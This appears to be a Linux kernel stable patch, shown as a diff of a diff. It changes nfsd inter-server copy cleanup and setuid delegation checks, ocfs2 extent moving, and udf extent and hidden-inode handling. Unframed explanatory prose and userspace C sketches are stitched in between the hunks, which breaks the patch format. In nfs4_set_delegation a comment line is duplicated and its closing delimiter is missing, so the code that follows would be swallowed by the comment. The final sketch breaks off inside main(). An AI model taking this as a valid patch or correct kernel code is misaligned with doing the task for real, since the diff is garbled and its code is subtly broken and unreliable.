++static void release_copy_files(struct nfsd4_copy *copy)
++{
++	if (copy->nf_src)
++		nfsd_file_put(copy->nf_src);
++	if (copy->nf_dst)
++		nfsd_file_put(copy->nf_dst);
+ }
+ 
+ static void cleanup_async_copy(struct nfsd4_copy *copy)
+ {
+ 	nfs4_free_copy_state(copy);
+-	nfsd_file_put(copy->nf_dst);
+-	if (!nfsd4_ssc_is_inter(copy))
+-		nfsd_file_put(copy->nf_src);
+-	spin_lock(&copy->cp_clp->async_lock);
+-	list_del(&copy->copies);
+-	spin_unlock(&copy->cp_clp->async_lock);
++	release_copy_files(copy);
++	if (copy->cp_clp) {
++		spin_lock(&copy->cp_clp->async_lock);
++		if (!list_empty(&copy->copies))
++			list_del_init(&copy->copies);
++		spin_unlock(&copy->cp_clp->async_lock);
++	}
+ 	nfs4_put_copy(copy);
+ }
+ 
+@@ -1762,8 +1743,8 @@ static int nfsd4_do_async_copy(void *data)
+ 	if (nfsd4_ssc_is_inter(copy)) {
+ 		struct file *filp;
+ 
+-		filp = nfs42_ssc_open(copy->ss_mnt, &copy->c_fh,
+-				      &copy->stateid);
++		filp = nfs42_ssc_open(copy->ss_nsui->nsui_vfsmount,
++				      &copy->c_fh, &copy->stateid);
+ 		if (IS_ERR(filp)) {
+ 			switch (PTR_ERR(filp)) {
+ 			case -EBADF:
+@@ -1777,11 +1758,10 @@ static int nfsd4_do_async_copy(void *data)
+ 		}
+ 		nfserr = nfsd4_do_copy(copy, filp, copy->nf_dst->nf_file,
+ 				       false);
+-		nfsd4_cleanup_inter_ssc(copy->ss_mnt, filp, copy->nf_dst);
++		nfsd4_cleanup_inter_ssc(copy->ss_nsui, filp, copy->nf_dst);
+ 	} else {
+ 		nfserr = nfsd4_do_copy(copy, copy->nf_src->nf_file,
+ 				       copy->nf_dst->nf_file, false);
+-		nfsd4_cleanup_intra_ssc(copy->nf_src, copy->nf_dst);
+ 	}
+ 
+ do_callback:
+@@ -1803,8 +1783,7 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 			status = nfserr_notsupp;
+ 			goto out;
+ 		}
+-		status = nfsd4_setup_inter_ssc(rqstp, cstate, copy,
+-				&copy->ss_mnt);
++		status = nfsd4_setup_inter_ssc(rqstp, cstate, copy);
+ 		if (status)
+ 			return nfserr_offload_denied;
+ 	} else {
+@@ -1823,12 +1802,13 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 		async_copy = kzalloc(sizeof(struct nfsd4_copy), GFP_KERNEL);
+ 		if (!async_copy)
+ 			goto out_err;
++		INIT_LIST_HEAD(&async_copy->copies);
++		refcount_set(&async_copy->refcount, 1);
+ 		async_copy->cp_src = kmalloc(sizeof(*async_copy->cp_src), GFP_KERNEL);
+ 		if (!async_copy->cp_src)
+ 			goto out_err;
+ 		if (!nfs4_init_copy_state(nn, copy))
+ 			goto out_err;
+-		refcount_set(&async_copy->refcount, 1);
+ 		memcpy(&copy->cp_res.cb_stateid, &copy->cp_stateid.cs_stid,
+ 			sizeof(copy->cp_res.cb_stateid));
+ 		dup_copy_fields(copy, async_copy);
+@@ -1845,18 +1825,22 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	} else {
+ 		status = nfsd4_do_copy(copy, copy->nf_src->nf_file,
+ 				       copy->nf_dst->nf_file, true);
+-		nfsd4_cleanup_intra_ssc(copy->nf_src, copy->nf_dst);
+ 	}
+ out:
++	release_copy_files(copy);
+ 	return status;
+ out_err:
++	if (nfsd4_ssc_is_inter(copy)) {
++		/*
++		 * Source's vfsmount of inter-copy will be unmounted
++		 * by the laundromat. Use copy instead of async_copy
++		 * since async_copy->ss_nsui might not be set yet.
++		 */
++		refcount_dec(&copy->ss_nsui->nsui_refcnt);
++	}
+ 	if (async_copy)
+ 		cleanup_async_copy(async_copy);
+ 	status = nfserrno(-ENOMEM);
+-	/*
+-	 * source's vfsmount of inter-copy will be unmounted
+-	 * by the laundromat
+-	 */
+ 	goto out;
+ }
+ 
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 2247d107da90b..34561764e5c97 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -991,7 +991,6 @@ static int nfs4_init_cp_state(struct nfsd_net *nn, copy_stateid_t *stid,
+ 
+ 	stid->cs_stid.si_opaque.so_clid.cl_boot = (u32)nn->boot_time;
+ 	stid->cs_stid.si_opaque.so_clid.cl_id = nn->s2s_cp_cl_id;
+-	stid->cs_type = cs_type;
+ 
+ 	idr_preload(GFP_KERNEL);
+ 	spin_lock(&nn->s2s_cp_lock);
+@@ -1002,6 +1001,7 @@ static int nfs4_init_cp_state(struct nfsd_net *nn, copy_stateid_t *stid,
+ 	idr_preload_end();
+ 	if (new_id < 0)
+ 		return 0;
++	stid->cs_type = cs_type;
+ 	return 1;
+ }
+ 
+@@ -1035,7 +1035,8 @@ void nfs4_free_copy_state(struct nfsd4_copy *copy)
+ {
+ 	struct nfsd_net *nn;
+ 
+-	WARN_ON_ONCE(copy->cp_stateid.cs_type != NFS4_COPY_STID);
++	if (copy->cp_stateid.cs_type != NFS4_COPY_STID)
++		return;
+ 	nn = net_generic(copy->cp_clp->net, nfsd_net_id);
+ 	spin_lock(&nn->s2s_cp_lock);
+ 	idr_remove(&nn->s2s_cp_stateids,
+@@ -5257,16 +5258,17 @@ nfs4_upgrade_open(struct svc_rqst *rqstp, struct nfs4_file *fp,
+ 	/* test and set deny mode */
+ 	spin_lock(&fp->fi_lock);
+ 	status = nfs4_file_check_deny(fp, open->op_share_deny);
+-	if (status == nfs_ok) {
+-		if (status != nfserr_share_denied) {
+-			set_deny(open->op_share_deny, stp);
+-			fp->fi_share_deny |=
+-				(open->op_share_deny & NFS4_SHARE_DENY_BOTH);
+-		} else {
+-			if (nfs4_resolve_deny_conflicts_locked(fp, false,
+-					stp, open->op_share_deny, false))
+-				status = nfserr_jukebox;
+-		}
++	switch (status) {
++	case nfs_ok:
++		set_deny(open->op_share_deny, stp);
++		fp->fi_share_deny |=
++			(open->op_share_deny & NFS4_SHARE_DENY_BOTH);
++		break;
++	case nfserr_share_denied:
++		if (nfs4_resolve_deny_conflicts_locked(fp, false,
++				stp, open->op_share_deny, false))
++			status = nfserr_jukebox;
++		break;
+ 	}
+ 	spin_unlock(&fp->fi_lock);
+ 
+@@ -5397,6 +5399,23 @@ nfsd4_verify_deleg_dentry(struct nfsd4_open *open, struct nfs4_file *fp,
+ 	return 0;
+ }
+ 
++/*
++ * We avoid breaking delegations held by a client due to its own activity, but
++ * clearing setuid/setgid bits on a write is an implicit activity and the client
++ * may not notice and continue using the old mode. Avoid giving out a delegation
++ * on setuid/setgid files when the client is requesting an open for write.
++ */
++static int
++nfsd4_verify_setuid_write(struct nfsd4_open *open, struct nfsd_file *nf)
++{
++	struct inode *inode = file_inode(nf->nf_file);
++
++	if ((open->op_share_access & NFS4_SHARE_ACCESS_WRITE) &&
++	    (inode->i_mode & (S_ISUID|S_ISGID)))
++		return -EAGAIN;
++	return 0;
++}
++
+ static struct nfs4_delegation *
+ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 		    struct svc_fh *parent)
+@@ -5430,6 +5449,8 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	spin_lock(&fp->fi_lock);
+ 	if (nfs4_delegation_exists(clp, fp))
+ 		status = -EAGAIN;
++	else if (nfsd4_verify_setuid_write(open, nf))
++		status = -EAGAIN;
+ 	else if (!fp->fi_deleg_file) {
+ 		fp->fi_deleg_file = nf;
+ 		/* increment early to prevent fi_deleg_file from being
+@@ -5470,6 +5491,14 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	if (status)
+ 		goto out_unlock;
+ 
++	/*
++	 * Now that the deleg is set, check again to ensure that nothing
++	 * raced in and changed the mode while we weren't lookng.
++	 * raced in and changed the mode while we weren't looking.
++	status = nfsd4_verify_setuid_write(open, fp->fi_deleg_file);
++	if (status)
++		goto out_unlock;
++
+ 	spin_lock(&state_lock);
+ 	spin_lock(&fp->fi_lock);
+ 	if (fp->fi_had_conflict)
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 8b1afde192118..6b20f285f3ca6 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -357,7 +357,7 @@ void nfsd_copy_write_verifier(__be32 verf[2], struct nfsd_net *nn)
+ 
+ 	do {
+ 		read_seqbegin_or_lock(&nn->writeverf_lock, &seq);
+-		memcpy(verf, nn->writeverf, sizeof(*verf));
++		memcpy(verf, nn->writeverf, sizeof(nn->writeverf));
+ 	} while (need_seqretry(&nn->writeverf_lock, seq));
+ 	done_seqretry(&nn->writeverf_lock, seq);
+ }
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 4eb4e1039c7f4..132335011ccae 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -1143,37 +1143,6 @@ TRACE_EVENT(nfsd_file_close,
+ 	)
+ );
+ 
+-TRACE_EVENT(nfsd_file_fsync,
+-	TP_PROTO(
+-		const struct nfsd_file *nf,
+-		int ret
+-	),
+-	TP_ARGS(nf, ret),
+-	TP_STRUCT__entry(
+-		__field(void *, nf_inode)
+-		__field(int, nf_ref)
+-		__field(int, ret)
+-		__field(unsigned long, nf_flags)
+-		__field(unsigned char, nf_may)
+-		__field(struct file *, nf_file)
+-	),
+-	TP_fast_assign(
+-		__entry->nf_inode = nf->nf_inode;
+-		__entry->nf_ref = refcount_read(&nf->nf_ref);
+-		__entry->ret = ret;
+-		__entry->nf_flags = nf->nf_flags;
+-		__entry->nf_may = nf->nf_may;
+-		__entry->nf_file = nf->nf_file;
+-	),
+-	TP_printk("inode=%p ref=%d flags=%s may=%s nf_file=%p ret=%d",
+-		__entry->nf_inode,
+-		__entry->nf_ref,
+-		show_nf_flags(__entry->nf_flags),
+-		show_nfsd_may_flags(__entry->nf_may),
+-		__entry->nf_file, __entry->ret
+-	)
+-);
+-
+ #include "cache.h"
+ 
+ TRACE_DEFINE_ENUM(RC_DROPIT);
+diff --git a/fs/nfsd/xdr4.h b/fs/nfsd/xdr4.h
+index 0eb00105d845b..36c3340c1d54a 100644
+--- a/fs/nfsd/xdr4.h
++++ b/fs/nfsd/xdr4.h
+@@ -571,7 +571,7 @@ struct nfsd4_copy {
+ 	struct task_struct	*copy_task;
+ 	refcount_t		refcount;
+ 
+-	struct vfsmount		*ss_mnt;
++	struct nfsd4_ssc_umount_item *ss_nsui;
+ 	struct nfs_fh		c_fh;
+ 	nfs4_stateid		stateid;
+ };
+diff --git a/fs/ocfs2/move_extents.c b/fs/ocfs2/move_extents.c
+index 192cad0662d8b..b1e32ec4a9d41 100644
+--- a/fs/ocfs2/move_extents.c
++++ b/fs/ocfs2/move_extents.c
+@@ -105,14 +105,6 @@ static int __ocfs2_move_extent(handle_t *handle,
+ 	 */
+ 	replace_rec.e_flags = ext_flags & ~OCFS2_EXT_REFCOUNTED;
+ 
+-	ret = ocfs2_journal_access_di(handle, INODE_CACHE(inode),
+-				      context->et.et_root_bh,
+-				      OCFS2_JOURNAL_ACCESS_WRITE);
+-	if (ret) {
+-		mlog_errno(ret);
+-		goto out;
+-	}
+-
+ 	ret = ocfs2_split_extent(handle, &context->et, path, index,
+ 				 &replace_rec, context->meta_ac,
+ 				 &context->dealloc);
+@@ -121,8 +113,6 @@ static int __ocfs2_move_extent(handle_t *handle,
+ 		goto out;
+ 	}
+ 
+-	ocfs2_journal_dirty(handle, context->et.et_root_bh);
+-
+ 	context->new_phys_cpos = new_p_cpos;
+ 
+ 	/*
+@@ -444,7 +434,7 @@ static int ocfs2_find_victim_alloc_group(struct inode *inode,
+ 			bg = (struct ocfs2_group_desc *)gd_bh->b_data;
+ 
+ 			if (vict_blkno < (le64_to_cpu(bg->bg_blkno) +
+-						le16_to_cpu(bg->bg_bits))) {
++						(le16_to_cpu(bg->bg_bits) << bits_per_unit))) {
+ 
+ 				*ret_bh = gd_bh;
+ 				*vict_bit = (vict_blkno - blkno) >>
+@@ -559,6 +549,7 @@ static void ocfs2_probe_alloc_group(struct inode *inode, struct buffer_head *bh,
+ 			last_free_bits++;
+ 
+ 		if (last_free_bits == move_len) {
++			i -= move_len;
+ 			*goal_bit = i;
+ 			*phys_cpos = base_cpos + i;
+ 			break;
+@@ -1030,18 +1021,19 @@ int ocfs2_ioctl_move_extents(struct file *filp, void __user *argp)
+ 
+ 	context->range = &range;
+ 
++	/*
++	 * ok, the default threshold for the defragmentation
++	 * is 1M, since our maximum clustersize was 1M also.
++	 * any thought?
++	 */
++	if (!range.me_threshold)
++		range.me_threshold = 1024 * 1024;
++
++	if (range.me_threshold > i_size_read(inode))
++		range.me_threshold = i_size_read(inode);
++
+ 	if (range.me_flags & OCFS2_MOVE_EXT_FL_AUTO_DEFRAG) {
+ 		context->auto_defrag = 1;
+-		/*
+-		 * ok, the default theshold for the defragmentation
+-		 * is 1M, since our maximum clustersize was 1M also.
+-		 * any thought?
+-		 */
+-		if (!range.me_threshold)
+-			range.me_threshold = 1024 * 1024;
+-
+-		if (range.me_threshold > i_size_read(inode))
+-			range.me_threshold = i_size_read(inode);
+ 
+ 		if (range.me_flags & OCFS2_MOVE_EXT_FL_PART_DEFRAG)
+ 			context->partial = 1;
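
The ocfs2_find_victim_alloc_group() fix above scales bg_bits (a count
of allocation bits) into blocks before using it as a range bound; the
old code compared a block number directly against a bit count. A sketch
with hypothetical numbers:

  #include <stdbool.h>
  #include <stdio.h>

  static bool blkno_in_group(unsigned long long vict_blkno,
                             unsigned long long bg_blkno,
                             unsigned int bg_bits,
                             unsigned int bits_per_unit)
  {
          /* each bit covers 2^bits_per_unit blocks, so the group spans
           * bg_bits << bits_per_unit blocks starting at bg_blkno */
          unsigned long long span =
                  (unsigned long long)bg_bits << bits_per_unit;

          return vict_blkno >= bg_blkno && vict_blkno < bg_blkno + span;
  }

  int main(void)
  {
          /* 2048 bits, 8 blocks per bit -> 16384-block group */
          printf("%d\n", blkno_in_group(10000, 0, 2048, 3)); /* 1 */
          printf("%d\n", blkno_in_group(20000, 0, 2048, 3)); /* 0 */
          return 0;
  }
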
+diff --git a/fs/open.c b/fs/open.c
+index 9d0197db15e7b..20717ec510c07 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -1411,8 +1411,9 @@ int filp_close(struct file *filp, fl_owner_t id)
+ {
+ 	int retval = 0;
+ 
+-	if (!file_count(filp)) {
+-		printk(KERN_ERR "VFS: Close: file count is 0\n");
++	if (CHECK_DATA_CORRUPTION(file_count(filp) == 0,
++			"VFS: Close: file count is 0 (f_op=%ps)",
++			filp->f_op)) {
+ 		return 0;
+ 	}
+ 
+diff --git a/fs/super.c b/fs/super.c
+index 8d39e4f11cfa3..4f8a626a35cd9 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -491,10 +491,23 @@ void generic_shutdown_super(struct super_block *sb)
+ 		if (sop->put_super)
+ 			sop->put_super(sb);
+ 
+-		if (!list_empty(&sb->s_inodes)) {
+-			printk("VFS: Busy inodes after unmount of %s. "
+-			   "Self-destruct in 5 seconds.  Have a nice day...\n",
+-			   sb->s_id);
++		if (CHECK_DATA_CORRUPTION(!list_empty(&sb->s_inodes),
++				"VFS: Busy inodes after unmount of %s (%s)",
++				sb->s_id, sb->s_type->name)) {
++			/*
++			 * Adding a proper bailout path here would be hard, but
++			 * we can at least make it more likely that a later
++			 * iput_final() or such crashes cleanly.
++			 */
++			struct inode *inode;
++
++			spin_lock(&sb->s_inode_list_lock);
++			list_for_each_entry(inode, &sb->s_inodes, i_sb_list) {
++				inode->i_op = VFS_PTR_POISON;
++				inode->i_sb = VFS_PTR_POISON;
++				inode->i_mapping = VFS_PTR_POISON;
++			}
++			spin_unlock(&sb->s_inode_list_lock);
+ 		}
+ 	}
+ 	spin_lock(&sb_lock);
+diff --git a/fs/udf/file.c b/fs/udf/file.c
+index 5c659e23e578f..8be51161f3e52 100644
+--- a/fs/udf/file.c
++++ b/fs/udf/file.c
+@@ -149,26 +149,24 @@ static ssize_t udf_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 		goto out;
+ 
+ 	down_write(&iinfo->i_data_sem);
+-	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
+-		loff_t end = iocb->ki_pos + iov_iter_count(from);
+-
+-		if (inode->i_sb->s_blocksize <
+-				(udf_file_entry_alloc_offset(inode) + end)) {
+-			err = udf_expand_file_adinicb(inode);
+-			if (err) {
+-				inode_unlock(inode);
+-				udf_debug("udf_expand_adinicb: err=%d\n", err);
+-				return err;
+-			}
+-		} else {
+-			iinfo->i_lenAlloc = max(end, inode->i_size);
+-			up_write(&iinfo->i_data_sem);
++	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB &&
++	    inode->i_sb->s_blocksize < (udf_file_entry_alloc_offset(inode) +
++				 iocb->ki_pos + iov_iter_count(from))) {
++		err = udf_expand_file_adinicb(inode);
++		if (err) {
++			inode_unlock(inode);
++			udf_debug("udf_expand_adinicb: err=%d\n", err);
++			return err;
+ 		}
+ 	} else
+ 		up_write(&iinfo->i_data_sem);
+ 
+ 	retval = __generic_file_write_iter(iocb, from);
+ out:
++	down_write(&iinfo->i_data_sem);
++	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB && retval > 0)
++		iinfo->i_lenAlloc = inode->i_size;
++	up_write(&iinfo->i_data_sem);
+ 	inode_unlock(inode);
+ 
+ 	if (retval > 0) {
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index e92a16435a29e..259152a08852b 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -526,8 +526,10 @@ static int udf_do_extend_file(struct inode *inode,
+ 	}
+ 
+ 	if (fake) {
+-		udf_add_aext(inode, last_pos, &last_ext->extLocation,
+-			     last_ext->extLength, 1);
++		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
++				   last_ext->extLength, 1);
++		if (err < 0)
++			goto out_err;
+ 		count++;
+ 	} else {
+ 		struct kernel_lb_addr tmploc;
+@@ -561,7 +563,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
+ 				   last_ext->extLength, 1);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 		count++;
+ 	}
+ 	if (new_block_bytes) {
+@@ -570,7 +572,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
+ 				   last_ext->extLength, 1);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 		count++;
+ 	}
+ 
+@@ -584,6 +586,11 @@ out:
+ 		return -EIO;
+ 
+ 	return count;
++out_err:
++	/* Remove extents we've created so far */
++	udf_clear_extent_cache(inode);
++	udf_truncate_extents(inode);
++	return err;
+ }
+ 
+ /* Extend the final block of the file to final_block_len bytes */
+@@ -798,19 +805,17 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 		c = 0;
+ 		offset = 0;
+ 		count += ret;
+-		/* We are not covered by a preallocated extent? */
+-		if ((laarr[0].extLength & UDF_EXTENT_FLAG_MASK) !=
+-						EXT_NOT_RECORDED_ALLOCATED) {
+-			/* Is there any real extent? - otherwise we overwrite
+-			 * the fake one... */
+-			if (count)
+-				c = !c;
+-			laarr[c].extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
+-				inode->i_sb->s_blocksize;
+-			memset(&laarr[c].extLocation, 0x00,
+-				sizeof(struct kernel_lb_addr));
+-			count++;
+-		}
++		/*
++		 * Is there any real extent? - otherwise we overwrite the fake
++		 * one...
++		 */
++		if (count)
++			c = !c;
++		laarr[c].extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
++			inode->i_sb->s_blocksize;
++		memset(&laarr[c].extLocation, 0x00,
++			sizeof(struct kernel_lb_addr));
++		count++;
+ 		endnum = c + 1;
+ 		lastblock = 1;
+ 	} else {
+@@ -1087,23 +1092,8 @@ static void udf_merge_extents(struct inode *inode, struct kernel_long_ad *laarr,
+ 			blocksize - 1) >> blocksize_bits)))) {
+ 
+ 			if (((li->extLength & UDF_EXTENT_LENGTH_MASK) +
+-				(lip1->extLength & UDF_EXTENT_LENGTH_MASK) +
+-				blocksize - 1) & ~UDF_EXTENT_LENGTH_MASK) {
+-				lip1->extLength = (lip1->extLength -
+-						  (li->extLength &
+-						   UDF_EXTENT_LENGTH_MASK) +
+-						   UDF_EXTENT_LENGTH_MASK) &
+-							~(blocksize - 1);
+-				li->extLength = (li->extLength &
+-						 UDF_EXTENT_FLAG_MASK) +
+-						(UDF_EXTENT_LENGTH_MASK + 1) -
+-						blocksize;
+-				lip1->extLocation.logicalBlockNum =
+-					li->extLocation.logicalBlockNum +
+-					((li->extLength &
+-						UDF_EXTENT_LENGTH_MASK) >>
+-						blocksize_bits);
+-			} else {
++			     (lip1->extLength & UDF_EXTENT_LENGTH_MASK) +
++			     blocksize - 1) <= UDF_EXTENT_LENGTH_MASK) {
+ 				li->extLength = lip1->extLength +
+ 					(((li->extLength &
+ 						UDF_EXTENT_LENGTH_MASK) +
+@@ -1388,6 +1378,7 @@ reread:
+ 		ret = -EIO;
+ 		goto out;
+ 	}
++	iinfo->i_hidden = hidden_inode;
+ 	iinfo->i_unique = 0;
+ 	iinfo->i_lenEAttr = 0;
+ 	iinfo->i_lenExtents = 0;
+@@ -1723,8 +1714,12 @@ static int udf_update_inode(struct inode *inode, int do_sync)
+ 
+ 	if (S_ISDIR(inode->i_mode) && inode->i_nlink > 0)
+ 		fe->fileLinkCount = cpu_to_le16(inode->i_nlink - 1);
+-	else
+-		fe->fileLinkCount = cpu_to_le16(inode->i_nlink);
++	else {
++		if (iinfo->i_hidden)
++			fe->fileLinkCount = cpu_to_le16(0);
++		else
++			fe->fileLinkCount = cpu_to_le16(inode->i_nlink);
++	}
+ 
+ 	fe->informationLength = cpu_to_le64(inode->i_size);
+ 
+@@ -1895,8 +1890,13 @@ struct inode *__udf_iget(struct super_block *sb, struct kernel_lb_addr *ino,
+ 	if (!inode)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	if (!(inode->i_state & I_NEW))
++	if (!(inode->i_state & I_NEW)) {
++		if (UDF_I(inode)->i_hidden != hidden_inode) {
++			iput(inode);
++			return ERR_PTR(-EFSCORRUPTED);
++		}
+ 		return inode;
++	}
+ 
+ 	memcpy(&UDF_I(inode)->i_location, ino, sizeof(struct kernel_lb_addr));
+ 	err = udf_read_inode(inode, hidden_inode);
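
udf_do_extend_file() above gains a common out_err label that truncates whatever extents were created before a failing udf_add_aext(). A small sketch of that cleanup-on-partial-failure shape (add_extent() and truncate_extents() are hypothetical stand-ins):

#include <stdio.h>

/* Each step can fail; on failure, undo everything added so far. */
static int add_extent(int i) { return i < 2 ? 0 : -5; /* third add fails */ }
static void truncate_extents(void) { puts("rolled back partial extents"); }

static int extend_file(int nr)
{
	int i, err;

	for (i = 0; i < nr; i++) {
		err = add_extent(i);
		if (err < 0)
			goto out_err;
	}
	return nr;

out_err:
	/* Remove extents we've created so far, as the patch does. */
	truncate_extents();
	return err;
}

int main(void)
{
	printf("extend_file -> %d\n", extend_file(3));
	return 0;
}
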
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 4042d9739fb78..6dc9d8dad88eb 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -147,6 +147,7 @@ static struct inode *udf_alloc_inode(struct super_block *sb)
+ 	ei->i_next_alloc_goal = 0;
+ 	ei->i_strat4096 = 0;
+ 	ei->i_streamdir = 0;
++	ei->i_hidden = 0;
+ 	init_rwsem(&ei->i_data_sem);
+ 	ei->cached_extent.lstart = -1;
+ 	spin_lock_init(&ei->i_extent_cache_lock);
+diff --git a/fs/udf/udf_i.h b/fs/udf/udf_i.h
+index 06ff7006b8227..312b7c9ef10e2 100644
+--- a/fs/udf/udf_i.h
++++ b/fs/udf/udf_i.h
+@@ -44,7 +44,8 @@ struct udf_inode_info {
+ 	unsigned		i_use : 1;	/* unallocSpaceEntry */
+ 	unsigned		i_strat4096 : 1;
+ 	unsigned		i_streamdir : 1;
+-	unsigned		reserved : 25;
++	unsigned		i_hidden : 1;	/* hidden system inode */
++	unsigned		reserved : 24;
+ 	__u8			*i_data;
+ 	struct kernel_lb_addr	i_locStreamdir;
+ 	__u64			i_lenStreams;
+diff --git a/fs/udf/udf_sb.h b/fs/udf/udf_sb.h
+index 4fa620543d302..2205859731dc2 100644
+--- a/fs/udf/udf_sb.h
++++ b/fs/udf/udf_sb.h
+@@ -51,6 +51,8 @@
+ #define MF_DUPLICATE_MD		0x01
+ #define MF_MIRROR_FE_LOADED	0x02
+ 
++#define EFSCORRUPTED EUCLEAN
++
+ struct udf_meta_data {
+ 	__u32	s_meta_file_loc;
+ 	__u32	s_mirror_file_loc;
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 20b21b577deaa..9054a5185e1a9 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -296,6 +296,10 @@ int mipi_dsi_dcs_set_display_brightness(struct mipi_dsi_device *dsi,
+ 					u16 brightness);
+ int mipi_dsi_dcs_get_display_brightness(struct mipi_dsi_device *dsi,
+ 					u16 *brightness);
++int mipi_dsi_dcs_set_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 brightness);
++int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 *brightness);
+ 
+ /**
+  * mipi_dsi_dcs_write_seq - transmit a DCS command with payload
+diff --git a/include/drm/drm_print.h b/include/drm/drm_print.h
+index a44fb7ef257f6..094ded23534c7 100644
+--- a/include/drm/drm_print.h
++++ b/include/drm/drm_print.h
+@@ -521,7 +521,7 @@ __printf(1, 2)
+ void __drm_err(const char *format, ...);
+ 
+ #if !defined(CONFIG_DRM_USE_DYNAMIC_DEBUG)
+-#define __drm_dbg(fmt, ...)		___drm_dbg(NULL, fmt, ##__VA_ARGS__)
++#define __drm_dbg(cat, fmt, ...)		___drm_dbg(NULL, cat, fmt, ##__VA_ARGS__)
+ #else
+ #define __drm_dbg(cat, fmt, ...)					\
+ 	_dynamic_func_call_cls(cat, fmt, ___drm_dbg,			\
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 891f8cbcd0436..1680b6e1e5362 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -487,6 +487,7 @@ struct request_queue {
+ 	DECLARE_BITMAP		(blkcg_pols, BLKCG_MAX_POLS);
+ 	struct blkcg_gq		*root_blkg;
+ 	struct list_head	blkg_list;
++	struct mutex		blkcg_mutex;
+ #endif
+ 
+ 	struct queue_limits	limits;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index c1bd1bd105067..942f9ac9fa7b6 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -266,6 +266,13 @@ static inline bool map_value_has_kptrs(const struct bpf_map *map)
+ 	return !IS_ERR_OR_NULL(map->kptr_off_tab);
+ }
+ 
++/* 'dst' must be a temporary buffer and should not point to memory that is being
++ * used in parallel by a bpf program or bpf syscall, otherwise the access from
++ * the bpf program or bpf syscall may be corrupted by the reinitialization,
++ * leading to weird problems. Even if 'dst' is newly allocated from the bpf
++ * memory allocator, it is still possible for 'dst' to be used in parallel
++ * by a bpf program or bpf syscall.
++ */
+ static inline void check_and_init_map_value(struct bpf_map *map, void *dst)
+ {
+ 	if (unlikely(map_value_has_spin_lock(map)))
+diff --git a/include/linux/context_tracking.h b/include/linux/context_tracking.h
+index dcef4a9e4d63e..d4afa8508a806 100644
+--- a/include/linux/context_tracking.h
++++ b/include/linux/context_tracking.h
+@@ -130,9 +130,36 @@ static __always_inline unsigned long ct_state_inc(int incby)
+ 	return arch_atomic_add_return(incby, this_cpu_ptr(&context_tracking.state));
+ }
+ 
++static __always_inline bool warn_rcu_enter(void)
++{
++	bool ret = false;
++
++	/*
++	 * Horrible hack to shut up recursive RCU isn't watching fail since
++	 * lots of the actual reporting also relies on RCU.
++	 */
++	preempt_disable_notrace();
++	if (rcu_dynticks_curr_cpu_in_eqs()) {
++		ret = true;
++		ct_state_inc(RCU_DYNTICKS_IDX);
++	}
++
++	return ret;
++}
++
++static __always_inline void warn_rcu_exit(bool rcu)
++{
++	if (rcu)
++		ct_state_inc(RCU_DYNTICKS_IDX);
++	preempt_enable_notrace();
++}
++
+ #else
+ static inline void ct_idle_enter(void) { }
+ static inline void ct_idle_exit(void) { }
++
++static __always_inline bool warn_rcu_enter(void) { return false; }
++static __always_inline void warn_rcu_exit(bool rcu) { }
+ #endif /* !CONFIG_CONTEXT_TRACKING_IDLE */
+ 
+ #endif
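
warn_rcu_enter()/warn_rcu_exit() above follow a save/restore token pattern: enter reports whether it had to make RCU watch, and exit undoes exactly that. A userspace sketch of the pattern, with in_eqs and preempt_count as illustrative globals:

#include <stdbool.h>
#include <stdio.h>

static bool in_eqs = true;	/* pretend RCU is not watching */
static int  preempt_count;

/* Enter: disable "preemption", make RCU watch if needed, return a token. */
static bool demo_warn_enter(void)
{
	bool ret = false;

	preempt_count++;
	if (in_eqs) {
		ret = true;
		in_eqs = false;	/* stands in for ct_state_inc() */
	}
	return ret;
}

/* Exit: undo only what enter did, then re-enable "preemption". */
static void demo_warn_exit(bool token)
{
	if (token)
		in_eqs = true;
	preempt_count--;
}

int main(void)
{
	bool rcu = demo_warn_enter();

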